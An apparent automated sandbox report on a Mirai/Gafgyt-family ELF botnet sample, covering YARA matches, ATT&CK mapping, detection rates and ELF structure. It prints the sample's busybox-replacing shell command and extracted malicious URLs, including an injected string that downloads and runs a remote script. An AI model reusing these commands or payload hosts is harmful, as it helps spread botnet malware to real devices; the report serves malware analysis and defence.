Process Memory Space: cN7jzEkjeq.elf PID: 5468	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1d1e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1d32:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1d46:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1d5a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1d6e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1d82:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1d96:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1daa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1dbe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1dd2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1de6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1dfa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e0e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e22:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e36:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e4a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e5e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e72:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e86:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1e9a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1eae:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Click to see the 13 entries

Shell command executed: /bin/sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/cN7jzEkjeq.elf bin/busybox; chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A"

Jump to behavior

Source: /bin/sh (PID: 5445)

Chmod executable: /usr/bin/chmod -> chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A

Jump to behavior

Source: /bin/sh (PID: 5443)

Mkdir executable: /usr/bin/mkdir -> mkdir bin

Jump to behavior

Source: /bin/sh (PID: 5442)

Rm executable: /usr/bin/rm -> rm -rf bin/busybox

Jump to behavior

Source: /bin/sh (PID: 5445)

Chmod executable with 777: /usr/bin/chmod -> chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A

Jump to behavior

Source: submitted sample

Stderr: chmod: cannot access ''$'\377\177\360\373\377\177''bin/busybox'$'\177\310\373\377\177\350\373\377\177\034\374\377\177\270\260''A': No such file or directory: exit code = 0

Source: /tmp/cN7jzEkjeq.elf (PID: 5438)

Queries kernel information via 'uname':

Jump to behavior

Source: cN7jzEkjeq.elf, 5438.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/cN7jzEkjeq.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/cN7jzEkjeq.elf
Source: cN7jzEkjeq.elf, 5438.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: cN7jzEkjeq.elf, 5438.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp	Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: cN7jzEkjeq.elf, 5438.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: cN7jzEkjeq.elf, 5464.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: cN7jzEkjeq.elf, type: SAMPLE
Source: Yara match	File source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR

Yara detected Moobot

Source: Yara match	File source: cN7jzEkjeq.elf, type: SAMPLE
Source: Yara match	File source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: cN7jzEkjeq.elf, type: SAMPLE
Source: Yara match	File source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR

Yara detected Moobot

Source: Yara match	File source: cN7jzEkjeq.elf, type: SAMPLE
Source: Yara match	File source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	2 Scripting	Path Interception	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
cN7jzEkjeq.elf	58%	Virustotal		Browse
cN7jzEkjeq.elf	53%	ReversingLabs	Linux.Trojan.Gafgyt
cN7jzEkjeq.elf	100%	Avira	EXP/ELF.Mirai.Z.A

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://0.0.0.0/bins/sora.mips;	0%	Avira URL Cloud	safe
http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$	cN7jzEkjeq.elf	false	Avira URL Cloud: safe	unknown
http://woshishabi.zzy.rip/x86	cN7jzEkjeq.elf	false		unknown
http://0.0.0.0/bins/sora.mips;	cN7jzEkjeq.elf	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	cN7jzEkjeq.elf	false	URL Reputation: safe URL Reputation: safe	unknown
http://woshishabi.zzy.rip/wget.sh$	cN7jzEkjeq.elf	false		unknown
http://104.244.74.231/mips	cN7jzEkjeq.elf	false		unknown
http://104.244.74.231/x86	cN7jzEkjeq.elf	false		unknown
http://purenetworks.com/HNAP1/	cN7jzEkjeq.elf	false	URL Reputation: safe	unknown
http://104.244.74.231/jack5tr.selfrep.sh	cN7jzEkjeq.elf	false		unknown
http://schemas.xmlsoap.org/soap/envelope/	cN7jzEkjeq.elf	false	URL Reputation: safe	unknown

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
Entropy (8bit):	6.772392690248151
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	cN7jzEkjeq.elf
File size:	161'935 bytes
MD5:	39ef44ca87bbf9e1a01b12fd2ae3237b
SHA1:	fadf4315ebeba07ba55bb1996eff32fb092f5532
SHA256:	b059459fcc36d07e0747d85abf2488c558ca728dc4099b831064cfe4541d6704
SHA512:	fae95bcd8dec240e66d742df0ab930e8518e6f707176904ffab47297501d2f068a90de04a063f7e240f6f990df553db0a4f77dbd5b611452ad6040b11a44147a
SSDEEP:	1536:1huQNfD7CVo6b7p/HZV97urtMM+doFgbLZ+IOHhslTBRlLVNWUHjIcW4aH:1huQNfv6fFfFXM+OK4thmJNBHyH
TLSH:	7AF39E46E5F19EE3C0125A392167FE740731E8A257431E73A62CCAFC1943DD8B099B7A
File Content Preview:	.ELF.....................@.4...........4. ...(...............@...@...........................C...C.,....6..............x...x.C.x.C.................Q.td............................././"O.n........#.@........#.*@L....o&O.n...l.............................

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001c0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	4
Section Header Offset:	135328
Section Header Size:	40
Number of Section Headers:	17
Header String Table Index:	14

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.init	PROGBITS	0x4000b4	0xb4	0x30	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x400100	0x100	0x1be60	0x0	0x6	AX	0	0	32
.fini	PROGBITS	0x41bf60	0x1bf60	0x24	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x41bf84	0x1bf84	0x4178	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x4300fc	0x200fc	0x7c	0x0	0x3	WA	0	0	4
.tbss	NOBITS	0x430178	0x20178	0x8	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x430178	0x20178	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x430180	0x20180	0x8	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x430188	0x20188	0x4	0x0	0x3	WA	0	0	4
.data	PROGBITS	0x43018c	0x2018c	0x288	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x430414	0x20414	0x14	0x4	0x3	WA	0	0	4
.bss	NOBITS	0x430428	0x20428	0x33a8	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x20428	0xc06	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x2102e	0x71	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x21348	0x38b0	0x10	0x0		16	329	4
.strtab	STRTAB	0x0	0x24bf8	0x2c97	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x200fc	0x200fc	6.9588	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x200fc	0x4300fc	0x4300fc	0x32c	0x36d4	3.7447	0x6	RW	0x10000	.eh_frame .tbss .ctors .dtors .jcr .data .got .bss
TLS	0x20178	0x430178	0x430178	0x0	0x8	0.0000	0x4	R	0x4	.tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x4000b4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x400100	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x41bf60	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x41bf84	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x4300fc	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x430178	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x430178	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x430180	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x430188	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x43018c	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x430414	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x430428	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	13
.jmp_loc	.symtab	0x41532a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x4153ca	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x4157ea	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x417f8a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x41808a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x41818a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x41828a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x41ac4a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x41b24a	0	NOTYPE	<unknown>	DEFAULT	2
.jmp_loc	.symtab	0x41b2ea	0	NOTYPE	<unknown>	DEFAULT	2
C.3.5229	.symtab	0x41fd44	12	OBJECT	<unknown>	DEFAULT	4
C.3.5917	.symtab	0x41f0ac	12	OBJECT	<unknown>	DEFAULT	4
C.3.5941	.symtab	0x420070	12	OBJECT	<unknown>	DEFAULT	4
C.3.5941	.symtab	0x420094	12	OBJECT	<unknown>	DEFAULT	4
C.4.5303	.symtab	0x41f094	24	OBJECT	<unknown>	DEFAULT	4
C.4.5942	.symtab	0x420088	12	OBJECT	<unknown>	DEFAULT	4
C.5.5949	.symtab	0x42007c	12	OBJECT	<unknown>	DEFAULT	4
C.8.5347	.symtab	0x41fd38	12	OBJECT	<unknown>	DEFAULT	4
GET_UID	.symtab	0x433360	1	OBJECT	<unknown>	DEFAULT	12
LOCAL_ADDR	.symtab	0x43335c	4	OBJECT	<unknown>	DEFAULT	12
L_abort	.symtab	0x4001f0	0	NOTYPE	<unknown>	DEFAULT	2
L_fini	.symtab	0x4001e8	0	NOTYPE	<unknown>	DEFAULT	2
L_init	.symtab	0x4001e4	0	NOTYPE	<unknown>	DEFAULT	2
L_main	.symtab	0x4001e0	0	NOTYPE	<unknown>	DEFAULT	2
L_movmem_2mod4_end	.symtab	0x41bec0	0	NOTYPE	<unknown>	DEFAULT	2
L_movmem_loop	.symtab	0x41beda	0	NOTYPE	<unknown>	DEFAULT	2
L_movmem_start_even	.symtab	0x41bee6	0	NOTYPE	<unknown>	DEFAULT	2
L_uClibc_main	.symtab	0x4001ec	0	NOTYPE	<unknown>	DEFAULT	2
_Exit	.symtab	0x413c30	104	FUNC	<unknown>	DEFAULT	2
_GLOBAL_OFFSET_TABLE_	.symtab	0x430414	0	OBJECT	<unknown>	HIDDEN	11
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__CTOR_END__	.symtab	0x43017c	0	OBJECT	<unknown>	DEFAULT	7
__CTOR_LIST__	.symtab	0x430178	0	OBJECT	<unknown>	DEFAULT	7
__C_ctype_b	.symtab	0x430324	4	OBJECT	<unknown>	DEFAULT	10
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x41fd70	768	OBJECT	<unknown>	DEFAULT	4
__DTOR_END__	.symtab	0x430184	0	OBJECT	<unknown>	DEFAULT	8
__DTOR_LIST__	.symtab	0x430180	0	OBJECT	<unknown>	DEFAULT	8
__EH_FRAME_BEGIN__	.symtab	0x4300fc	0	OBJECT	<unknown>	DEFAULT	5
__FRAME_END__	.symtab	0x430174	0	OBJECT	<unknown>	DEFAULT	5
__GI___C_ctype_b	.symtab	0x430324	4	OBJECT	<unknown>	HIDDEN	10
__GI___close	.symtab	0x417fc0	164	FUNC	<unknown>	HIDDEN	2
__GI___close_nocancel	.symtab	0x417fd0	40	FUNC	<unknown>	HIDDEN	2
__GI___ctype_b	.symtab	0x430328	4	OBJECT	<unknown>	HIDDEN	10
__GI___errno_location	.symtab	0x4142e8	44	FUNC	<unknown>	HIDDEN	2
__GI___fcntl_nocancel	.symtab	0x413a64	180	FUNC	<unknown>	HIDDEN	2
__GI___fgetc_unlocked	.symtab	0x41aac8	216	FUNC	<unknown>	HIDDEN	2
__GI___glibc_strerror_r	.symtab	0x415abc	32	FUNC	<unknown>	HIDDEN	2
__GI___libc_close	.symtab	0x417fc0	164	FUNC	<unknown>	HIDDEN	2
__GI___libc_fcntl	.symtab	0x413b18	280	FUNC	<unknown>	HIDDEN	2
__GI___libc_open	.symtab	0x4180c0	172	FUNC	<unknown>	HIDDEN	2
__GI___libc_read	.symtab	0x4182c0	172	FUNC	<unknown>	HIDDEN	2
__GI___libc_waitpid	.symtab	0x41b320	172	FUNC	<unknown>	HIDDEN	2
__GI___libc_write	.symtab	0x4181c0	172	FUNC	<unknown>	HIDDEN	2
__GI___open	.symtab	0x4180c0	172	FUNC	<unknown>	HIDDEN	2
__GI___open_nocancel	.symtab	0x4180d0	40	FUNC	<unknown>	HIDDEN	2
__GI___read	.symtab	0x4182c0	172	FUNC	<unknown>	HIDDEN	2
__GI___read_nocancel	.symtab	0x4182d0	40	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_fini	.symtab	0x4184d8	108	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_init	.symtab	0x41858c	68	FUNC	<unknown>	HIDDEN	2
__GI___waitpid	.symtab	0x41b320	172	FUNC	<unknown>	HIDDEN	2
__GI___write	.symtab	0x4181c0	172	FUNC	<unknown>	HIDDEN	2
__GI___write_nocancel	.symtab	0x4181d0	40	FUNC	<unknown>	HIDDEN	2
__GI___xpg_strerror_r	.symtab	0x415adc	224	FUNC	<unknown>	HIDDEN	2
__GI__exit	.symtab	0x413c30	104	FUNC	<unknown>	HIDDEN	2
__GI_abort	.symtab	0x4170c8	184	FUNC	<unknown>	HIDDEN	2
__GI_accept	.symtab	0x415c8c	116	FUNC	<unknown>	HIDDEN	2
__GI_bind	.symtab	0x415d00	64	FUNC	<unknown>	HIDDEN	2
__GI_close	.symtab	0x417fc0	164	FUNC	<unknown>	HIDDEN	2
__GI_closedir	.symtab	0x413fac	200	FUNC	<unknown>	HIDDEN	2
__GI_config_close	.symtab	0x4195b4	72	FUNC	<unknown>	HIDDEN	2
__GI_config_open	.symtab	0x4195fc	60	FUNC	<unknown>	HIDDEN	2
__GI_config_read	.symtab	0x419318	668	FUNC	<unknown>	HIDDEN	2
__GI_connect	.symtab	0x415d80	116	FUNC	<unknown>	HIDDEN	2
__GI_execve	.symtab	0x418e30	60	FUNC	<unknown>	HIDDEN	2
__GI_exit	.symtab	0x417624	116	FUNC	<unknown>	HIDDEN	2
__GI_fclose	.symtab	0x419718	444	FUNC	<unknown>	HIDDEN	2
__GI_fcntl	.symtab	0x413b18	280	FUNC	<unknown>	HIDDEN	2
__GI_fflush_unlocked	.symtab	0x41a8c4	516	FUNC	<unknown>	HIDDEN	2
__GI_fgetc	.symtab	0x41a5b8	212	FUNC	<unknown>	HIDDEN	2
__GI_fgetc_unlocked	.symtab	0x41aac8	216	FUNC	<unknown>	HIDDEN	2
__GI_fgets	.symtab	0x41a68c	188	FUNC	<unknown>	HIDDEN	2
__GI_fgets_unlocked	.symtab	0x41aba0	132	FUNC	<unknown>	HIDDEN	2
__GI_fopen	.symtab	0x4198d4	24	FUNC	<unknown>	HIDDEN	2
__GI_fork	.symtab	0x417ba8	572	FUNC	<unknown>	HIDDEN	2
__GI_fputs_unlocked	.symtab	0x415228	68	FUNC	<unknown>	HIDDEN	2
__GI_fseek	.symtab	0x41b964	28	FUNC	<unknown>	HIDDEN	2
__GI_fseeko64	.symtab	0x41b980	316	FUNC	<unknown>	HIDDEN	2
__GI_fstat	.symtab	0x418e6c	96	FUNC	<unknown>	HIDDEN	2
__GI_fwrite_unlocked	.symtab	0x41526c	168	FUNC	<unknown>	HIDDEN	2
__GI_getc_unlocked	.symtab	0x41aac8	216	FUNC	<unknown>	HIDDEN	2
__GI_getdtablesize	.symtab	0x418f7c	52	FUNC	<unknown>	HIDDEN	2
__GI_getegid	.symtab	0x418fb0	18	FUNC	<unknown>	HIDDEN	2
__GI_geteuid	.symtab	0x418fc2	18	FUNC	<unknown>	HIDDEN	2
__GI_getgid	.symtab	0x418fd4	18	FUNC	<unknown>	HIDDEN	2
__GI_getpagesize	.symtab	0x418fe8	28	FUNC	<unknown>	HIDDEN	2
__GI_getpid	.symtab	0x417de4	52	FUNC	<unknown>	HIDDEN	2
__GI_getrlimit	.symtab	0x419004	64	FUNC	<unknown>	HIDDEN	2
__GI_getsockname	.symtab	0x415df4	64	FUNC	<unknown>	HIDDEN	2
__GI_getuid	.symtab	0x419044	18	FUNC	<unknown>	HIDDEN	2
__GI_inet_addr	.symtab	0x415c20	44	FUNC	<unknown>	HIDDEN	2
__GI_inet_aton	.symtab	0x41b114	200	FUNC	<unknown>	HIDDEN	2
__GI_initstate_r	.symtab	0x417474	204	FUNC	<unknown>	HIDDEN	2
__GI_ioctl	.symtab	0x41b744	268	FUNC	<unknown>	HIDDEN	2
__GI_isatty	.symtab	0x41b07c	36	FUNC	<unknown>	HIDDEN	2
__GI_kill	.symtab	0x413ca8	60	FUNC	<unknown>	HIDDEN	2
__GI_listen	.symtab	0x415e78	64	FUNC	<unknown>	HIDDEN	2
__GI_lseek64	.symtab	0x41be48	108	FUNC	<unknown>	HIDDEN	2
__GI_memchr	.symtab	0x41ac80	24	FUNC	<unknown>	HIDDEN	2
__GI_memcpy	.symtab	0x415480	860	FUNC	<unknown>	HIDDEN	2
__GI_memmove	.symtab	0x4158c0	188	FUNC	<unknown>	HIDDEN	2
__GI_mempcpy	.symtab	0x41bd80	36	FUNC	<unknown>	HIDDEN	2
__GI_memrchr	.symtab	0x41aca0	200	FUNC	<unknown>	HIDDEN	2
__GI_memset	.symtab	0x415820	150	FUNC	<unknown>	HIDDEN	2
__GI_mmap	.symtab	0x418d24	64	FUNC	<unknown>	HIDDEN	2
__GI_mremap	.symtab	0x419058	68	FUNC	<unknown>	HIDDEN	2
__GI_munmap	.symtab	0x41909c	60	FUNC	<unknown>	HIDDEN	2
__GI_nanosleep	.symtab	0x419118	108	FUNC	<unknown>	HIDDEN	2
__GI_open	.symtab	0x4180c0	172	FUNC	<unknown>	HIDDEN	2
__GI_opendir	.symtab	0x414104	176	FUNC	<unknown>	HIDDEN	2
__GI_raise	.symtab	0x417e18	116	FUNC	<unknown>	HIDDEN	2
__GI_random	.symtab	0x417194	100	FUNC	<unknown>	HIDDEN	2
__GI_random_r	.symtab	0x41733c	108	FUNC	<unknown>	HIDDEN	2
__GI_rawmemchr	.symtab	0x41bda4	164	FUNC	<unknown>	HIDDEN	2
__GI_read	.symtab	0x4182c0	172	FUNC	<unknown>	HIDDEN	2
__GI_readdir	.symtab	0x414254	148	FUNC	<unknown>	HIDDEN	2
__GI_readdir64	.symtab	0x419280	152	FUNC	<unknown>	HIDDEN	2
__GI_recv	.symtab	0x415ef8	128	FUNC	<unknown>	HIDDEN	2
__GI_recvfrom	.symtab	0x415fbc	144	FUNC	<unknown>	HIDDEN	2
__GI_remove	.symtab	0x41434c	124	FUNC	<unknown>	HIDDEN	2
__GI_rmdir	.symtab	0x419184	60	FUNC	<unknown>	HIDDEN	2
__GI_sbrk	.symtab	0x418d64	104	FUNC	<unknown>	HIDDEN	2
__GI_select	.symtab	0x413d6c	136	FUNC	<unknown>	HIDDEN	2
__GI_send	.symtab	0x41608c	128	FUNC	<unknown>	HIDDEN	2
__GI_sendto	.symtab	0x416150	144	FUNC	<unknown>	HIDDEN	2
__GI_setsid	.symtab	0x413df4	60	FUNC	<unknown>	HIDDEN	2
__GI_setsockopt	.symtab	0x4161e0	68	FUNC	<unknown>	HIDDEN	2
__GI_setstate_r	.symtab	0x417540	228	FUNC	<unknown>	HIDDEN	2
__GI_sigaction	.symtab	0x41b1dc	20	FUNC	<unknown>	HIDDEN	2
__GI_sigprocmask	.symtab	0x4191c0	116	FUNC	<unknown>	HIDDEN	2
__GI_sleep	.symtab	0x417e8c	224	FUNC	<unknown>	HIDDEN	2
__GI_socket	.symtab	0x416224	64	FUNC	<unknown>	HIDDEN	2
